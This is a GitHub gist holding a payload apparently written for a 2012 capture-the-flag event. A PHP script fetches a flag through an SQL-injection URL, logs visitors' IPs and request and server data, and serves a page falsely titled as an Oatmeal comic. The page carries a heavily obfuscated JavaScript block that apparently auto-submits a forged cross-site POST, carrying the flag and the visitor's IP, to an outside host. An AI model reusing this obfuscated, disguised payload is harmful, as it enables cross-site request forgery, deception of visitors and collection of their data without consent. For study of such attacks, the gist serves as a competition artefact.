Created
November 24, 2012 20:48
-
-
Save obilodeau/4141355 to your computer and use it in GitHub Desktop.
H0H0H0Day-2012-nano-ctf-payload-encoded
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| # grab IP | |
| $src_ip = $_SERVER[REMOTE_ADDR]; | |
| # FETCH FLAG | |
| # slurp remote stuff in a string | |
| $result = file_get_contents("http://SQLi-censored..."); | |
| # extract a substring with a regex | |
| preg_match('/---([0-9a-z-]*)---/', $result, $match); | |
| $flag = $match[1]; | |
| # LOGGING | |
| $file = 'CENSORED.log'; | |
| $data = "New client: $src_ip! flag is $flag, time is " . date(DATE_RFC822) . "\n"; | |
| $data .= print_r($_GET, true); | |
| $data .= print_r($_POST, true); | |
| $data .= print_r($_REQUEST, true); | |
| $data .= print_r($_ENV, true); | |
| $data .= print_r($_SERVER, true); | |
| file_put_contents($file, $data, FILE_APPEND | LOCK_EX); | |
| ?> | |
| <HTML> | |
| <HEAD> | |
| <TITLE>How different age groups celebrate Christmas - The Oatmeal</TITLE> | |
| </HEAD> | |
| <script language="javascript" type="text/javascript"> | |
| var ip = "<?= $src_ip ?>"; | |
| var flag = "<?= $flag ?>"; | |
| </script> | |
| <script language="javascript" type="text/javascript"> | |
| $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.$__+$.___+$.$$$$+$._$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.$__+$.___+"=\\"+$.$__+$.___+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+"\\"+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+"\\"+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"(\\\""+$.$$$$+$._$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.$_$+"\\\");\\"+$.__$+$._$_+$.$$$$+$._$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.$_$+".\\"+$.__$+$.$$_+$._$$+$.$$$_+$.__+"\\"+$.__$+$.___+$.__$+$.__+$.__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.$_$$+$._+$.__+$.$$$_+"(\\\"\\"+$.__$+$.$_$+$.$_$+$.$$$_+$.__+"\\"+$.__$+$.$_$+$.___+$._$+$.$$_$+"\\\",\\"+$.$__+$.___+"'\\"+$.__$+$._$_+$.___+"\\"+$.__$+$.__$+$.$$$+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$._$_+$.$__+"');\\"+$.__$+$._$_+$.$$$$+$._$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.$_$+".\\"+$.__$+$.$$_+$._$$+$.$$$_+$.__+"\\"+$.__$+$.___+$.__$+$.__+$.__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.$_$$+$._+$.__+$.$$$_+"(\\\""+$.$_$_+$.$$__+$.__+"\\"+$.__$+$.$_$+$.__$+$._$+"\\"+$.__$+$.$_$+$.$$_+"\\\",\\"+$.$__+$.___+"'\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"://\\"+$.__$+$.$$_+$._$$+$._+$.$_$$+$.$_$_+$.__+$._$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$_$+$.__$+$.$$__+"\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$$__+$._+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+"\\"+$.__$+$.$$$+$.__$+"."+$.$$__+$._$+"\\"+$.__$+$.$_$+$.$_$+":"+$.$___+$.$___+$.$___+$._$$+"/');\\"+$.__$+$._$_+"\\"+$.__$+$._$_+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$.___+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$$_+$._$$+"=\\"+$.$__+$.___+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+"\\"+$.$__+$.___+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$$$+$.__$+"()\\"+$.__$+$._$_+"\\"+$.__$+$._$_+"\\"+$.__$+$.$$_+$.___+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$$_+$._$$+"[\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$$_+$.$$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"_"+$.$$__+$._$+$.$$_$+$.$$$_+"\\\"]\\"+$.$__+$.___+"=\\"+$.$__+$.___+$.$$$$+(![]+"")[$._$_]+$.$_$_+"\\"+$.__$+$.$__+$.$$$+";\\"+$.__$+$._$_+"\\"+$.__$+$.$$_+$.___+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$$_+$._$$+"[\\\""+$.$$$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$$_+$._$$+$.__+"_\\"+$.__$+$.$_$+$.$$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\\"]\\"+$.$__+$.___+"=\\"+$.$__+$.___+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+";\\"+$.__$+$._$_+"\\"+$.__$+$.$$_+$.___+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$$_+$._$$+"[\\\""+(![]+"")[$._$_]+$.$_$_+"\\"+$.__$+$.$$_+$._$$+$.__+"_\\"+$.__$+$.$_$+$.$$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\\"]\\"+$.$__+$.___+"=\\"+$.$__+$.___+"\\\"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.$__+$.___+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.__$+$._$$+"/\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.__$+$.$_$+"\\\";\\"+$.__$+$._$_+"\\"+$.__$+$.$$_+$.___+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$$_+$._$$+"[\\\""+$.$$$_+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+"\\\"]\\"+$.$__+$.___+"=\\"+$.$__+$.___+"\\\":\\"+$.__$+$._$_+$.___+"@\\\"\\"+$.$__+$.___+"+\\"+$.$__+$.___+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+";\\"+$.__$+$._$_+"\\"+$.__$+$._$_+$.$$$$+$._$+"\\"+$.__$+$.$$_+$._$_+"(\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.$__+$.___+"\\"+$.__$+$.$_$+$._$$+$.$$$_+"\\"+$.__$+$.$$$+$.__$+"\\"+$.$__+$.___+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$.___+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$$_+$._$$+")\\"+$.$__+$.___+"\\"+$.__$+$._$_+"{\\"+$.__$+$._$_+"\\"+$.$__+$.___+"\\"+$.$__+$.___+"\\"+$.$__+$.___+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.$__+$.___+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.$_$+$.__$+$.$$$_+(![]+"")[$._$_]+$.$$_$+"\\"+$.$__+$.___+"=\\"+$.$__+$.___+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+"\\"+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+"\\"+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"(\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$$_+$.___+$._+$.__+"\\\");\\"+$.__$+$._$_+"\\"+$.$__+$.___+"\\"+$.$__+$.___+"\\"+$.$__+$.___+"\\"+$.$__+$.___+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.$_$+$.__$+$.$$$_+(![]+"")[$._$_]+$.$$_$+".\\"+$.__$+$.$$_+$._$$+$.$$$_+$.__+"\\"+$.__$+$.___+$.__$+$.__+$.__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.$_$$+$._+$.__+$.$$$_+"(\\\""+$.__+"\\"+$.__$+$.$$$+$.__$+"\\"+$.__$+$.$$_+$.___+$.$$$_+"\\\",\\"+$.$__+$.___+"\\\"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+"\\\");\\"+$.__$+$._$_+"\\"+$.$__+$.___+"\\"+$.$__+$.___+"\\"+$.$__+$.___+"\\"+$.$__+$.___+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.$_$+$.__$+$.$$$_+(![]+"")[$._$_]+$.$$_$+".\\"+$.__$+$.$$_+$._$$+$.$$$_+$.__+"\\"+$.__$+$.___+$.__$+$.__+$.__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.$_$$+$._+$.__+$.$$$_+"(\\\"\\"+$.__$+$.$_$+$.$$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\\",\\"+$.$__+$.___+"\\"+$.__$+$.$_$+$._$$+$.$$$_+"\\"+$.__$+$.$$$+$.__$+");\\"+$.__$+$._$_+"\\"+$.$__+$.___+"\\"+$.$__+$.___+"\\"+$.$__+$.___+"\\"+$.$__+$.___+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.$_$+$.__$+$.$$$_+(![]+"")[$._$_]+$.$$_$+".\\"+$.__$+$.$$_+$._$$+$.$$$_+$.__+"\\"+$.__$+$.___+$.__$+$.__+$.__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.$_$$+$._+$.__+$.$$$_+"(\\\"\\"+$.__$+$.$$_+$.$$_+$.$_$_+(![]+"")[$._$_]+$._+$.$$$_+"\\\",\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$.___+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$$_+$._$$+"[\\"+$.__$+$.$_$+$._$$+$.$$$_+"\\"+$.__$+$.$$$+$.__$+"]);\\"+$.__$+$._$_+"\\"+$.__$+$._$_+"\\"+$.$__+$.___+"\\"+$.$__+$.___+"\\"+$.$__+$.___+"\\"+$.$__+$.___+$.$$$$+$._$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.$_$+"."+$.$_$_+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$.___+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.$$_$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+$.$$_$+"(\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.$_$+$.__$+$.$$$_+(![]+"")[$._$_]+$.$$_$+");\\"+$.__$+$._$_+"}\\"+$.__$+$._$_+"\\"+$.__$+$._$_+$.$$$$+$._$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.$_$+".\\"+$.__$+$.$$_+$._$$+$._+$.$_$$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$_$+$.__$+$.__+"();\\"+$.__$+$._$_+"\"")())(); | |
| </script> | |
| <BODY> | |
| </BODY> | |
| </HTML> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment